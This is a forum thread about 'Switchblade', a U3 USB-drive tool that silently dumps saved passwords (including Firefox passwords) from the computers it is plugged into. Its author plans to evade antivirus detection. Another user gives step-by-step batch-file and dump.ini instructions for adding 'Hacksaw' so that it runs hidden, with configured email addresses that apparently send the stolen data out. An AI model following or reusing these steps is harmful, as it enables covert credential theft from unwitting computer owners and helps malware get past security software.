Obi-Wahn's Switchblade

Obi-Wahn

bumpty bump my problem...

--=[ and ]=--

I think the package is in fact installed to the non-writable partition (mainly because I can't see any indication of it being installed on the writable partition, but I could be wrong...)

--=[ and ]=--

It depends on the AV I think. I plugged in my flash drive at my school and the AV caught it and deleted it and I had to reinstall and reconfigure it xD

Sorry Guys for late answer but I've to do a lot in the past.

@Skunkfoot: To 1st post: It's possible, that you cant just add the Hacksaw, because I've coded only the Switchblade part, and I never had to use the Hacksaw. If I found some time (maybe behind my desk *gg*) I look at the hacksaw and maybe -depends on time- I'll start developing.

But it's possible that the release came in January or so (cause I've to sell @ my Christmas market).

@RadarG: As far as I know, the entire Software is installed to the Writeable partition of the U3 Device. The Installations are Stored in "J:SystemApps" ("J" is the Letter of the writeable Partition), and my Switchblade should be in the Folder "65FAEC39-85E2-4CA5-A53F-D738C97D1538".

It's possible that some AV scanners detect some stuff, but that's a false positive. Most Tools I've used are from Nirsoft, and they're often detected by Scanners, because they're looking for Passwords. It depends on the Scanner and/or the User Input if the Files are only blocked or deleted. I'm working on a solution to prevent the detection, but that's far away.

The "ff_passwordsXX.txt" should contain Passwords of an Firefox Installation. It could be, that there's a Bug. I've to look at the Code to see if there's a failure. If there's so, I'll fix it.

Hey Obi, I just found out how to add the hacksaw to your Switchblade, pretty simple actually xD

--=[ Instructions ]=--

[x] Go to your Switchblade folder (hidden)

[x] Copy the CMD and SBS folders from your HackSaw to this folder (and configure your hacksaw's email addys if needed)

[x] create a little batch file (called Hacksaw.bat in this example) in the Switchblade folder with the following contents:

cd CMD

go.bat

[x] Go to your dump.ini file and edit the Xtras section to look like this:

1=explorer.exe %1%

2=Hacksaw.bat, , Hide

(NOTE: make sure you set your "Xtras" = "Yes") (Line 48, just above the Xtras section)

(This will run Hacksaw.bat, which in turn runs your go.bat file)

(NOTE: If you set the IgnoreMyComputers option to "Yes", the Hacksaw won't run on your computers either :))

@Obi-Wahn: If you still want to make a U3 Version of the HackSaw, that'd be swell, but I don't need it anymore :)

--Skunkfoot